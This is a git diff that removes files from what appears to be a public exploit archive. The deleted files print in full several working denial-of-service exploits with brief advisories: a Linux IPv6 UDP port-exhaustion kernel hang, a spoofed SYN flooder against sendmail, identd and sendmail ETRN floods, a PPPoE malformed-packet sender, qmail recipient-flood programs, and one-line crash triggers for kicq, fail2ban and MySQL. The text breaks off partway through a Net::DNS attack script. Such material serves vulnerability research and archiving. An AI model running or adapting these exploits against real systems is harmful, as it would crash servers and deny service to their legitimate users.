struct sockaddr_in6 addr; - int val = 1; - - setsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &val, sizeof (val)); - - memset (&addr, 0, sizeof (addr)); - addr.sin6_family = AF_INET6; - addr.sin6_port = htons (port); - if (bind (fd, (struct sockaddr *)&addr, sizeof (addr)) == 0) - return fd; - - close (fd); - } - return -1; -} - - -static int -get_fd_limit (void) -{ - struct rlimit lim; - - getrlimit (RLIMIT_NOFILE, &lim); - lim.rlim_cur = lim.rlim_max; - setrlimit (RLIMIT_NOFILE, &lim); - return (int)lim.rlim_max; -} - - -static void -get_port_range (uint16_t *range) -{ - FILE *stream; - - /* conservative defaults */ - range[0] = 1024; - range[1] = 65535; - - stream = fopen ("/proc/sys/net/ipv4/ip_local_port_range", "r"); - if (stream != NULL) - { - unsigned i[2]; - - if ((fscanf (stream, "%u %u", i, i + 1) == 2) - && (i[0] <= i[1]) && (i[1] < 65535)) - { - range[0] = (uint16_t)i[0]; - range[1] = (uint16_t)i[1]; - } - fclose (stream); - } -} - - -/* The criticial is fairly simple to raise : the infinite loop occurs when - * calling bind with no speficied port number (ie zero), if and only if the - * IPv6 stack cannot find any free UDP port within the local port range - * (normally 32768-61000). Because this requires times more sockets than what - * a process normally can open at a given time, we have to spawn several - * processes. Then, the simplest way to trigger the crash condition consists - * of opening up kernel-allocated UDP ports until it crashes, but that is - * fairly slow (because allocation are stored in small a hash table of lists, - * that are checked at each allocation). A much faster scheme involves getting - * the local port range from /proc, allocating one by one, and only then, ask - * for automatic (any/zero) port allocation. - */ -static int -proof (void) -{ - int lim, val = 2; - pid_t pid, ppid; - uint16_t range[2], port; - - lim = get_fd_limit (); - if (lim <= 3) - return -2; - - get_port_range (range); - - port = range[0]; - ppid = getpid (); - - puts ("Stage 1..."); - do - { - switch (pid = fork ()) - { - case 0: - for (val = 3; val < lim; val++) - close (val); - - do - { - if (bind_udpv6_port (port) >= 0) - { - if (port) - port++; - } - else - if (port && (errno == EADDRINUSE)) - port++; /* skip already used port */ - else - if (errno != EMFILE) - /* EAFNOSUPPORT -> no IPv6 stack */ - /* EADDRINUSE -> not vulnerable */ - exit (1); - - if (port > range[1]) - { - puts ("Stage 2... should crash quickly"); - port = 0; - } - } - while (errno != EMFILE); - - break; /* EMFILE: spawn new process */ - - case -1: - exit (2); - - default: - wait (&val); - if (ppid != getpid ()) - exit (WIFEXITED (val) ? WEXITSTATUS (val) : 2); - } - } - while (pid == 0); - - puts ("System not vulnerable"); - return -val; -} - -int -main (int argc, char *argv[]) -{ - setvbuf (stdout, NULL, _IONBF, 0); - puts ("Linux kernel IPv6 UDP port infinite loop vulnerability\n" - "proof of concept code\n" - "Copyright (C) 2005 Remi Denis-Courmont " - "<\x65\x78\x70\x6c\x6f\x69\x74\x40\x73\x69\x6d\x70" - "\x68\x61\x6c\x65\x6d\x70\x69\x6e\x2e\x63\x6f\x6d>\n"); - - return -proof (); -} - diff --git a/platforms/linux/local/26489.c b/platforms/linux/local/26489.c deleted file mode 100755 index 5b6936e29..000000000 --- a/platforms/linux/local/26489.c +++ /dev/null @@ -1,243 +0,0 @@ -source: http://www.securityfocus.com/bid/15365/info - -Linux Kernel is reported prone to a local denial-of-service vulnerability. This issue arises from a failure to properly unregister kernel resources when network devices are removed. - -This issue allows local attackers to deny service to legitimate users. Attackers may also be able to execute arbitrary code in the context of the kernel, but this has not been confirmed. - -/* - * Linux kernel - * IPv6 UDP port selection infinite loop - * local denial of service vulnerability - * proof of concept code - * version 1.0 (Oct 29 2005) - * CVE ID: CAN-2005-2973 - * - * by Remi Denis-Courmont < exploit at simphalempin dot com > - * http://www.simphalempin.com/dev/ - * - * Vulnerable: - * - Linux < 2.6.14 with IPv6 - * - * Not vulnerable: - * - Linux >= 2.6.14 - * - Linux without IPv6 - * - * Fix: - * http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git; - * a=commit;h=87bf9c97b4b3af8dec7b2b79cdfe7bfc0a0a03b2 - */ - - -/***************************************************************************** - * Copyright (C) 2005 Remi Denis-Courmont. All rights reserved. * - * * - * Redistribution and use in source and binary forms, with or without * - * modification, are permitted provided that the following conditions * - * are met: * - * 1. Redistributions of source code must retain the above copyright notice, * - * this list of conditions and the following disclaimer. * - * 2. Redistribution in binary form must reproduce the above copyright * - * notice, this list of conditions and the following disclaimer in the * - * documentation and/or other materials provided with the distribution. * - * * - * The author's liability shall not be incurred as a result of loss of due * - * the total or partial failure to fulfill anyone's obligations and direct * - * or consequential loss due to the software's use or performance. * - * * - * The current situation as regards scientific and technical know-how at the * - * time when this software was distributed did not enable all possible uses * - * to be tested and verified, nor for the presence of any or all faults to * - * be detected. In this respect, people's attention is drawn to the risks * - * associated with loading, using, modifying and/or developing and * - * reproducing this software. * - * The user shall be responsible for verifying, by any or all means, the * - * software's suitability for its requirements, its due and proper * - * functioning, and for ensuring that it shall not cause damage to either * - * persons or property. * - * * - * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * - * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * - * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * - * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * - * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * - * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * - * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * - * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * - * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * - * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * - * * - * The author does not either expressly or tacitly warrant that this * - * software does not infringe any or all third party intellectual right * - * relating to a patent, software or to any or all other property right. * - * Moreover, the author shall not hold someone harmless against any or all * - * proceedings for infringement that may be instituted in respect of the * - * use, modification and redistrbution of this software. * - *****************************************************************************/ - - -#include -#include -#include - -#include -#include -#include -#include -#include -#include -#include -#include - -static int -bind_udpv6_port (uint16_t port) -{ - int fd; - - fd = socket (AF_INET6, SOCK_DGRAM, IPPROTO_UDP); - if (fd != -1) - { - struct sockaddr_in6 addr; - int val = 1; - - setsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &val, sizeof (val)); - - memset (&addr, 0, sizeof (addr)); - addr.sin6_family = AF_INET6; - addr.sin6_port = htons (port); - if (bind (fd, (struct sockaddr *)&addr, sizeof (addr)) == 0) - return fd; - - close (fd); - } - return -1; -} - - -static int -get_fd_limit (void) -{ - struct rlimit lim; - - getrlimit (RLIMIT_NOFILE, &lim); - lim.rlim_cur = lim.rlim_max; - setrlimit (RLIMIT_NOFILE, &lim); - return (int)lim.rlim_max; -} - - -static void -get_port_range (uint16_t *range) -{ - FILE *stream; - - /* conservative defaults */ - range[0] = 1024; - range[1] = 65535; - - stream = fopen ("/proc/sys/net/ipv4/ip_local_port_range", "r"); - if (stream != NULL) - { - unsigned i[2]; - - if ((fscanf (stream, "%u %u", i, i + 1) == 2) - && (i[0] <= i[1]) && (i[1] < 65535)) - { - range[0] = (uint16_t)i[0]; - range[1] = (uint16_t)i[1]; - } - fclose (stream); - } -} - - -/* The criticial is fairly simple to raise : the infinite loop occurs when - * calling bind with no speficied port number (ie zero), if and only if the - * IPv6 stack cannot find any free UDP port within the local port range - * (normally 32768-61000). Because this requires times more sockets than what - * a process normally can open at a given time, we have to spawn several - * processes. Then, the simplest way to trigger the crash condition consists - * of opening up kernel-allocated UDP ports until it crashes, but that is - * fairly slow (because allocation are stored in small a hash table of lists, - * that are checked at each allocation). A much faster scheme involves getting - * the local port range from /proc, allocating one by one, and only then, ask - * for automatic (any/zero) port allocation. - */ -static int -proof (void) -{ - int lim, val = 2; - pid_t pid, ppid; - uint16_t range[2], port; - - lim = get_fd_limit (); - if (lim <= 3) - return -2; - - get_port_range (range); - - port = range[0]; - ppid = getpid (); - - puts ("Stage 1..."); - do - { - switch (pid = fork ()) - { - case 0: - for (val = 3; val < lim; val++) - close (val); - - do - { - if (bind_udpv6_port (port) >= 0) - { - if (port) - port++; - } - else - if (port && (errno == EADDRINUSE)) - port++; /* skip already used port */ - else - if (errno != EMFILE) - /* EAFNOSUPPORT -> no IPv6 stack */ - /* EADDRINUSE -> not vulnerable */ - exit (1); - - if (port > range[1]) - { - puts ("Stage 2... should crash quickly"); - port = 0; - } - } - while (errno != EMFILE); - - break; /* EMFILE: spawn new process */ - - case -1: - exit (2); - - default: - wait (&val); - if (ppid != getpid ()) - exit (WIFEXITED (val) ? WEXITSTATUS (val) : 2); - } - } - while (pid == 0); - - puts ("System not vulnerable"); - return -val; -} - -int -main (int argc, char *argv[]) -{ - setvbuf (stdout, NULL, _IONBF, 0); - puts ("Linux kernel IPv6 UDP port infinite loop vulnerability\n" - "proof of concept code\n" - "Copyright (C) 2005 Remi Denis-Courmont " - "<\x65\x78\x70\x6c\x6f\x69\x74\x40\x73\x69\x6d\x70" - "\x68\x61\x6c\x65\x6d\x70\x69\x6e\x2e\x63\x6f\x6d>\n"); - - return -proof (); -} - diff --git a/platforms/linux/local/29683.txt b/platforms/linux/local/29683.txt deleted file mode 100755 index f2b30852f..000000000 --- a/platforms/linux/local/29683.txt +++ /dev/null @@ -1,10 +0,0 @@ -source: http://www.securityfocus.com/bid/22737/info - -The Linux Kernel is prone to a denial-of-service vulnerability. - -A local attacker can exploit this issue to crash the kernel. - -Linux kernel versions 2.6.x are vulnerable to this issue. - -1. auditctl -w /etc/shadow -2. useradd userb \ No newline at end of file diff --git a/platforms/linux/remote/19075.c b/platforms/linux/remote/19075.c deleted file mode 100755 index 33eb197aa..000000000 --- a/platforms/linux/remote/19075.c +++ /dev/null @@ -1,55 +0,0 @@ -source: http://www.securityfocus.com/bid/83/info - -APC PowerChute PLUS is a software package that will safely shutdown computer systems locally or accross a network when UPS power starts to fail. When operating PowerChute PLUS normally listens to TCP ports 6547 and 6548, as well as for broadcast requests in UDP port 6549. - -A request packet can be craftted and sent to the UDP port such that the upsd server will crash. This is been tested in the Solaris i386 version of the product. - -It has also been reported the software will crash in some instances when port scanned. - -It seems you can also manage any APC UPS remotely without providing any credential if you have the APC client software. - -Both the client and server software also create files insecurely in /tmp. The pager script (dialpager.sh) also contains unsafe users of temporary files. The mailer script (mailer.sh) passes the files provided in the command line to rm without checking them. - ------ begin downupsd.c ----- -#include -#include -#include -#include -#include -#include -#include - -int main(int argc, char **argv) { -int s; -long on=1; -size_t addrsize; -char buffer[256]; -struct sockaddr_in toaddr, fromaddr; -struct hostent h_ent; - -if(argc!=2) { -fprintf(stderr, "Usage:\n\t%s \n", argv[0]); -exit(0); -} -s = socket(AF_INET,SOCK_DGRAM,0); -setsockopt(s, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on)); - -printf("Crashing upsd on host's subnet: %s\n", argv[1]); - -toaddr.sin_family = AF_INET; -toaddr.sin_port = htons(0); -toaddr.sin_addr.s_addr = 0x00000000; -bind(s, (struct sockaddr *)&toaddr, sizeof(struct sockaddr_in)); -toaddr.sin_port = htons(6549); -memcpy((char *)&h_ent, (char *)gethostbyname(argv[1]), sizeof(h_ent)); -memcpy(&toaddr.sin_addr.s_addr, h_ent.h_addr, sizeof(struct in_addr)); -toaddr.sin_addr.s_addr |= 0xff000000; -strcpy(buffer, "027|1|public|9|0|0|2010~|0\0"); -sendto(s, buffer, 256, 0, (struct sockaddr *)&toaddr, -sizeof(struct sockaddr_in)); - -printf("Crashed...\n"); -close(s); - -} -------- end downupsd.c ----- \ No newline at end of file diff --git a/platforms/linux/remote/19282.c b/platforms/linux/remote/19282.c deleted file mode 100755 index aaaacfa82..000000000 --- a/platforms/linux/remote/19282.c +++ /dev/null @@ -1,341 +0,0 @@ -source: http://www.securityfocus.com/bid/363/info - -The 2.0.x kernels have a quirk in the TCP implementation that have to do with the accept() call returning after only a syn has been recieved (as opposed to the three way handshake having been completed). Sendmail, which is compiled on many unices, makes the assumption that the three way handshake has been completed and a tcp connection has been fully established. This trust in a standard tcp implementation is seen in the following section of code : - -t = accept(DaemonSocket, - -(struct sockaddr *)&RealHostAddr, &lotherend); - -if (t >= 0 || errno != EINTR) - -break; - -} - -savederrno = errno; - -(void) blocksignal(SIGALRM); - -if (t < 0) - -{ errno = savederrno; - -syserr("getrequests: accept"); - -/* arrange to re-open the socket next time around */ - -(void) close(DaemonSocket); - -DaemonSocket = -1; - -refusingconnections = TRUE; - -sleep(5); - -continue; - -} - -It's possible to cause a denial of service here if a RST is sent after the initial SYN to the sendmail smtpd on port 25. If that were to be done, the sendmail smtpd would be caught in a loop (above) accepting, testing the socket [yes, the one which accept returned on listening on port 25], sleeping, and closing the socket for as long as the syns and following rsts are sent. It is also completely possible to do this with spoofed packets. - - -/* - -* smad.c - sendmail accept dos - - -* - -* Salvatore Sanfilippo [AntireZ] - -* Intesis SECURITY LAB Phone: +39-2-671563.1 - -* Via Settembrini, 35 Fax: +39-2-66981953 - -* I-20124 Milano ITALY Email: antirez@seclab.com - -* md5330@mclink.it - -* - -* compile it under Linux with gcc -Wall -o smad smad.c - -* - -* usage: smad fakeaddr victim [port] - -*/ - -#include - -#include - -#include - -#include - -#include - -#include - -#include - -#include - -#include - -#include - -#include - -#include - -#define SLEEP_UTIME 100000 /* modify it if necessary */ - -#define PACKETSIZE (sizeof(struct iphdr) + sizeof(struct tcphdr)) - -#define OFFSETTCP (sizeof(struct iphdr)) - -#define OFFSETIP (0) - -u_short cksum(u_short *buf, int nwords) - -{ - -unsigned long sum; - -u_short *w = buf; - -for (sum = 0; nwords > 0; nwords-=2) - -sum += *w++; - -sum = (sum >> 16) + (sum & 0xffff); - -sum += (sum >> 16); - -return ~sum; - -} - -void resolver (struct sockaddr * addr, char *hostname, u_short port) - -{ - -struct sockaddr_in *address; - -struct hostent *host; - -address = (struct sockaddr_in *)addr; - -(void) bzero((char *)address, sizeof(struct sockaddr_in)); - -address->sin_family = AF_INET; - -address->sin_port = htons(port); - -address->sin_addr.s_addr = inet_addr(hostname); - -if ( (int)address->sin_addr.s_addr == -1) { - -host = gethostbyname(hostname); - -if (host) { - -bcopy( host->h_addr, - -(char *)&address->sin_addr,host->h_length); - -} else { - -perror("Could not resolve address"); - -exit(-1); - -} - - -} - -} - -int main(int argc, char **argv) - -{ - -char runchar[] = "|/-\\"; - -char packet[PACKETSIZE], - -*fromhost, - -*tohost; - -u_short fromport = 3000, - -toport = 25; - -struct sockaddr_in local, remote; - -struct iphdr *ip = (struct iphdr*) (packet + OFFSETIP); - -struct tcphdr *tcp = (struct tcphdr*) (packet + OFFSETTCP); - -struct tcp_pseudohdr - -{ - -struct in_addr saddr; - -struct in_addr daddr; - -u_char zero; - -u_char protocol; - -u_short lenght; - -struct tcphdr tcpheader; - -} - -pseudoheader; - -int sock, result, runcharid = 0; - -if (argc < 3) - -{ - -printf("usage: %s fakeaddr victim [port]\n", argv[0]); - -exit(0); - -} - -if (argc == 4) - -toport = atoi(argv[3]); - -bzero((void*)packet, PACKETSIZE); - -fromhost = argv[1]; - -tohost = argv[2]; - -resolver((struct sockaddr*)&local, fromhost, fromport); - -resolver((struct sockaddr*)&remote, tohost, toport); - -sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); - -if (sock == -1) { - -perror("can't get raw socket"); - -exit(1); - -} - -/* src addr */ - -bcopy((char*)&local.sin_addr, &ip->saddr,sizeof(ip->saddr)); - -/* dst addr */ - -bcopy((char*)&remote.sin_addr,&ip->daddr,sizeof(ip->daddr)); - -ip->version = 4; - -ip->ihl = sizeof(struct iphdr)/4; - -ip->tos = 0; - -ip->tot_len = htons(PACKETSIZE); - -ip->id = htons(getpid() & 255); - -/* no flags */ - -ip->frag_off = 0; - -ip->ttl = 64; - -ip->protocol = 6; - -ip->check = 0; - -tcp->th_dport = htons(toport); - -tcp->th_sport = htons(fromport); - -tcp->th_seq = htonl(32089744); - -tcp->th_ack = htonl(0); - -tcp->th_off = sizeof(struct tcphdr)/4; - -/* 6 bit reserved */ - -tcp->th_flags = TH_SYN; - -tcp->th_win = htons(512); - -/* start of pseudo header stuff */ - -bzero(&pseudoheader, 12+sizeof(struct tcphdr)); - -pseudoheader.saddr.s_addr=local.sin_addr.s_addr; - -pseudoheader.daddr.s_addr=remote.sin_addr.s_addr; - -pseudoheader.protocol = 6; - -pseudoheader.lenght = htons(sizeof(struct tcphdr)); - -bcopy((char*) tcp, (char*) &pseudoheader.tcpheader, - -sizeof(struct tcphdr)); - -/* end */ - -tcp->th_sum = cksum((u_short *) &pseudoheader, - -12+sizeof(struct tcphdr)); - -/* 16 bit urg */ - -while (0) - -{ - -result = sendto(sock, packet, PACKETSIZE, 0, - -(struct sockaddr *)&remote, sizeof(remote)); - -if (result != PACKETSIZE) - -{ - -perror("sending packet"); - -exit(0); - -} printf("\b"); - -printf("%c", runchar[runcharid]); - -fflush(stdout); - -runcharid++; - -if (runcharid == 4) - -runcharid = 0; - -usleep(SLEEP_UTIME); - -} - -return 0; - -} \ No newline at end of file diff --git a/platforms/linux/remote/19463.c b/platforms/linux/remote/19463.c deleted file mode 100755 index 6b11f54da..000000000 --- a/platforms/linux/remote/19463.c +++ /dev/null @@ -1,109 +0,0 @@ -source: http://www.securityfocus.com/bid/587/info - -In the inetd.conf under certain distributions of SuSE Linux the in.identd daemon is started with the -w -t120 option. This means that one identd process waits 120 seconds after answering the first request to answer the next request. If a malicious remote attacker starts a large number of ident requests in a short period of time it will force the target machine to start multiple daemons because the initial daemon is in a time wait state. This can eventually lead the machine to starve itself of memory resulting essentially in a machine halt. - -/* susekill.c by friedolin - * - * used to kill lame SuSE Linux boxes with identd running - * identd must be started with -w -t120 to crash a machine - * - * have fun, friedolin - * - * based on gewse.c by napster - */ - -/* Tested systems: - * - * vulnerable: - * - * SuSE-Linux 4.4 - 6.2 - * Slackware 3.2 and 3.6 - * - * not vulnerable: - * - * RedHat 5.0 - 6.0 - * Debian 2.0 - 2.1 - * - * not tested: - * - * pre 4.3 SuSE systems - * pre 5.0 RedHat - * pre 2.0 Debian - * other Slackware releases - * Caldera Open Linux, ... - * - * please send me your results and experiences ! - * -*/ - -#include -#include -#include -#include -#include -#include -#include -#include - -#define GETIDENT "1027, 6667 : USERID : UNIX : killsuse" - -int sockdesc; -int portkill; -int numkill; -int x; - -void usage(char *progname) -{ - printf("susekill by friedolin (based on gewse.c)\n"); - printf("usage: %s <# of connections>\n",progname); - exit(69); -} - -main(int argc, char *argv[]) -{ - - struct sockaddr_in sin; - struct hostent *he; - - if (argc<3) usage(argv[0]); - - sin.sin_port = htons(113); - sin.sin_family = AF_INET; - - he = gethostbyname(argv[1]); - if (he) { - sin.sin_family = AF_INET; - sin.sin_port = htons(113); - memcpy((caddr_t)&sin.sin_addr.s_addr, he->h_addr, he->h_length); - } else { - perror("resolving"); - } - - numkill = atoi(argv[2]); - - printf("Flooding %s [%s] identd %d times.\n", argv[1], inet_ntoa(sin.sin_addr.s_addr), numkill); - printf("Killing"); - fflush(stdout); - - for (x=1;x<=numkill;x++) { - - sockdesc = socket(AF_INET, SOCK_STREAM, 0); - - if (sockdesc < 0) { - perror("socket"); - exit(69); - } - - if (connect(sockdesc, (struct sockaddr *)&sin, sizeof(sin)) < 0) { - perror("connect"); - exit(69); - } - - printf(" ."); - fflush(stdout); - (void) write(sockdesc, GETIDENT, strlen(GETIDENT)); - } - - printf("\n"); - -} diff --git a/platforms/linux/remote/19701.sh b/platforms/linux/remote/19701.sh deleted file mode 100755 index 8b13d96b8..000000000 --- a/platforms/linux/remote/19701.sh +++ /dev/null @@ -1,24 +0,0 @@ -source: http://www.securityfocus.com/bid/904/info - -There is a low-bandwidth dos vulnerability in Sendmail. When a client connects to the sendmail smtpd and sends an ETRN command to the server, the server fork()s and sleeps for 5 seconds. If many ETRN commands are sent to a server, it is possible to exhaust system resources and cause a denial of service or even a reboot of the server. - -#!/bin/sh - -TARGET=localhost -COUNT=150 -SLEEP=1 - -echo "gurghfrbl.sh - (c) lcamtuf '99" -echo -n "Tickle" - -while :; do -echo -n "." -( -NIC=0 -while [ "$NIC" -lt "$COUNT" ]; do -echo "ETRN x" -done -) | telnet $TARGET 25 &>/dev/null & -sleep $SLEEP -killall -9 telnet &>/dev/null -done \ No newline at end of file diff --git a/platforms/linux/remote/20494.pl b/platforms/linux/remote/20494.pl deleted file mode 100755 index 4d1fe8658..000000000 --- a/platforms/linux/remote/20494.pl +++ /dev/null @@ -1,42 +0,0 @@ -source: http://www.securityfocus.com/bid/2098/info - -Roaring Penguin Software's PPPoE is a freeware PPP over Ethernet client often used by ADSL subscribers running Linux or NetBSD. - -PPPoE contains a possibly remotely exploitable denial of service vulnerability in its handling of TCP packets when the Clamp_MSS option is used. If PPPoE recieves a malformed TCP packet with a "zero-length option", PPPoE will go into an infinite loop. As a result, the ppp connection being supported by PPPoE will time out and be terminated. A manual re-start is needed to regain functionality. - -This bug has been fixed by Roaring Penguin Software in a new version, see the solutions section. - -#!/usr/bin/perl -# POC script that causes a DoS in an PPP-over-Ethernet Link, in RedHat 7.0. -# Advisory: http://www.redhat.com/support/errata/RHSA-2000-130.html -# by dethy -use Net::RawIP; -use Getopt::Std; -getopts('d:s:p:c',\%args) || &usage; -if(defined($args{d})){$daddr=$args{d};}else{&usage;} -if(defined($args{s})){$src=$args{s};}else{$src=&randsrc;} -if(defined($port{p})){$port=$args{p};}else{&usage;} -if(defined($args{c})){$count=$args{c};}else{$count=10;} - -sub randport(){ - srand; - return $sport=(int rand 65510); - } - -sub randsrc(){ - srand; - return $saddr=(int rand 255).".".(int rand 255).".".(int rand 255).".".(int rand 255); - } - - $packet = new Net::RawIP({ip=>{},tcp=>{}}); - $packet->set({ ip => { saddr => $src, - daddr => $daddr, - tos => 3 }, - tcp => { source => $sport, - dest => $port, - syn => 1, psh => 1 } }); - - $packet->send(0,$count); - -sub usage(){ die("pppoe-link POC DoS on RH7\n$0 -d -s -p -c \n"); } - diff --git a/platforms/linux/remote/20561.pl b/platforms/linux/remote/20561.pl deleted file mode 100755 index d99ae635f..000000000 --- a/platforms/linux/remote/20561.pl +++ /dev/null @@ -1,35 +0,0 @@ -source: http://www.securityfocus.com/bid/2237/info - -qmail is an e-mail server package developed by Dan Bernstein. - -The qmail smtp server is subject to a denial of service. By specifying a large number of addresses in the recipient field (RCPT), qmail will stop responding. - -This behaviour is due to the dynamically allocated memory being exhausted. - -The condition occurs in situations where resource limits are not imposed on the server process. - -Many systems may be running qmail without resource limits. The existence of working exploit code poses a threat to these vulnerable qmail servers. - -Once affected, a restart of the qmail smtp service is required in order to gain normal functionality. - -It should be noted that this type of threat is not limited to qmail. Resource exhaustion attacks can be used against many internet services by remote attackers. - -#!/usr/local/bin/perl -w -# $Id: qmail.pl,v 1.4 1997/06/12 02:12:42 super Exp $ -require 5.002; -use strict; -use Socket; -if(!($ARGV[0])){print("usage: $0 FQDN","\n");exit;} -my $port = 25; my $proto = getprotobyname("tcp"); -my $iaddr = inet_aton($ARGV[0]) || die "No such host: $ARGV[0]"; -my $paddr = sockaddr_in($port, $iaddr); -socket(SKT, AF_INET, SOCK_STREAM, $proto) || die "socket() $!"; -connect(SKT, $paddr) && print("Connected established.\n") || die "connect() $!"; -send(SKT,"mail from: \n",0) || die "send() $!"; -my $infstr = "rcpt to: \n"; print("Attacking..","\n"); -while(){ -send(SKT,$infstr,0) || die "send() $!"; -} -die "Connection lost!"; - - diff --git a/platforms/linux/remote/20562.c b/platforms/linux/remote/20562.c deleted file mode 100755 index bee3d161c..000000000 --- a/platforms/linux/remote/20562.c +++ /dev/null @@ -1,92 +0,0 @@ -source: http://www.securityfocus.com/bid/2237/info - -qmail is an e-mail server package developed by Dan Bernstein. - -The qmail smtp server is subject to a denial of service. By specifying a large number of addresses in the recipient field (RCPT), qmail will stop responding. - -This behaviour is due to the dynamically allocated memory being exhausted. - -The condition occurs in situations where resource limits are not imposed on the server process. - -Many systems may be running qmail without resource limits. The existence of working exploit code poses a threat to these vulnerable qmail servers. - -Once affected, a restart of the qmail smtp service is required in order to gain normal functionality. - -It should be noted that this type of threat is not limited to qmail. Resource exhaustion attacks can be used against many internet services by remote attackers. - -/* - * qmail-dos-2 - run a qmail system out of swap space by feeding an infinite - * amount of recipients. - * - * Usage: qmail-dos-2 fully-qualified-hostname - * - * Author: Wietse Venema. The author is not responsible for abuse of this - * program. Use at your own risk. - */ -#include -#include -#include -#include -#include -#include -#include -#include - -void fatal(char *fmt,...) -{ - va_list ap; - - va_start(ap, fmt); - vfprintf(stderr, fmt, ap); - va_end(ap); - putc('\n', stderr); - exit(1); -} - -chat(FILE * fp, char *fmt,...) -{ - char buf[BUFSIZ]; - va_list ap; - - fseek(fp, 0L, SEEK_SET); - va_start(ap, fmt); - vfprintf(fp, fmt, ap); - va_end(ap); - fputs("\r\n", fp); - if (fflush(fp)) - fatal("connection lost"); - fseek(fp, 0L, SEEK_SET); - if (fgets(buf, sizeof(buf), fp) == 0) - fatal("connection lost"); - if (atoi(buf) / 100 != 2) - fatal("%s", buf); -} - -int main(int argc, char **argv) -{ - struct sockaddr_in sin; - struct hostent *hp; - char buf[BUFSIZ]; - int sock; - FILE *fp; - - if (argc != 2) - fatal("usage: %s host", argv[0]); - if ((hp = gethostbyname(argv[1])) == 0) - fatal("host %s not found", argv[1]); - memset((char *) &sin, 0, sizeof(sin)); - sin.sin_family = AF_INET; - memcpy((char *) &sin.sin_addr, hp->h_addr, sizeof(sin.sin_addr)); - sin.sin_port = htons(25); - if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) - fatal("socket: %s", strerror(errno)); - if (connect(sock, (struct sockaddr *) & sin, sizeof(sin)) < 0) - fatal("connect to %s: %s", argv[1], strerror(errno)); - if ((fp = fdopen(sock, "r+")) == 0) - fatal("fdopen: %s", strerror(errno)); - if (fgets(buf, sizeof(buf), fp) == 0) - fatal("connection lost"); - chat(fp, "mail from:", fp); - for (;;) - chat(fp, "rcpt to:", argv[1]); -} diff --git a/platforms/linux/remote/21262.txt b/platforms/linux/remote/21262.txt deleted file mode 100755 index 9f05fe7de..000000000 --- a/platforms/linux/remote/21262.txt +++ /dev/null @@ -1,10 +0,0 @@ -source: http://www.securityfocus.com/bid/4018/info - -kicq 2.0.0b1 is an ICQ client for the K Desktop Environment (KDE). kicq can be crashed remotely by initiating a telnet connection to a port it is listening on and sending "random" characters. This does not affect other components of the system, only the ICQ client. - -bash-2.05$ telnet 10.0.0.1 1030 -Trying 10.0.0.1... -Connected to 10.0.0.1. -Escape character is '^]'. -garbage -Connection closed by foreign host. \ No newline at end of file diff --git a/platforms/linux/remote/30430.txt b/platforms/linux/remote/30430.txt deleted file mode 100755 index 567d0f6f9..000000000 --- a/platforms/linux/remote/30430.txt +++ /dev/null @@ -1,14 +0,0 @@ -source: http://www.securityfocus.com/bid/25117/info - -Fail2ban is prone to a remote denial-of-service vulnerability because the application fails to properly ensure the validity of authentication-failure messages. - -Successfully exploiting this issue allows remote attackers to add arbitrary IP addresses to the block list used by the application. This allows attackers to deny further network access to arbitrary IP addresses, denying service to legitimate users. - -Fail2ban 0.8.0 and prior versions are vulnerable to this issue. - -This issue may be demonstrated by connecting to an SSH server with 'nc', and sending the following string: - -ROOT LOGIN REFUSED hi FROM 1.2.3.4 - -where '1.2.3.4' is an IP address to be blocked. - diff --git a/platforms/linux/remote/30744.txt b/platforms/linux/remote/30744.txt deleted file mode 100755 index 0dba485a6..000000000 --- a/platforms/linux/remote/30744.txt +++ /dev/null @@ -1,22 +0,0 @@ -source: http://www.securityfocus.com/bid/26353/info - -MySQL is prone to a remote denial-of-service vulnerability because the database server fails to properly handle unexpected input. - -Exploiting this issue allows remote attackers to crash affected database servers, denying service to legitimate users. Attackers must be able to execute arbitrary SQL statements on affected servers, which requires valid credentials to connect to affected servers. - -This issue affects MySQL 5.1.23 and prior versions. - -mysql> CREATE TABLE `test` ( -`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY, -`foo` text NOT NULL -) ENGINE=InnoDB DEFAULT CHARSET=latin1; -Query OK, 0 rows affected - -mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar'); -Empty set - -mysql> ALTER TABLE test ADD INDEX (foo(100)); -Query OK, 0 rows affected -Records: 0 Duplicates: 0 Warnings: 0 - -mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar'); \ No newline at end of file diff --git a/platforms/linux/remote/30895.pl b/platforms/linux/remote/30895.pl deleted file mode 100755 index a06fe0524..000000000 --- a/platforms/linux/remote/30895.pl +++ /dev/null @@ -1,39 +0,0 @@ -source: http://www.securityfocus.com/bid/26902/info - -The Perl Net::DNS module is prone to a remote denial-of-service vulnerability because the module fails to properly handle malformed DNS responses. - -Successfully exploiting this issue allows attackers to crash applications that use the affected module. - -Net::DNS 0.60 is vulnerable; other versions may also be affected. - -#!/usr/bin/perl -# Beyond Security(c) -# Vulnerability found by beSTORM - DNS Server module - -use strict; -use IO::Socket; -my($sock, $oldmsg, $newmsg, $hisaddr, $hishost, $MAXLEN, $PORTNO); -$MAXLEN = 1024; -$PORTNO = 5351; -$sock = IO::Socket::INET->new(LocalPort => $PORTNO, Proto => 'udp') or die "socket: $@"; -print "Awaiting UDP messages on port $PORTNO\n"; - -my $oldmsg = "\x5a\x40\x81\x80\x00\x01\x00\x01\x00\x01\x00\x01\x07\x63\x72\x61". 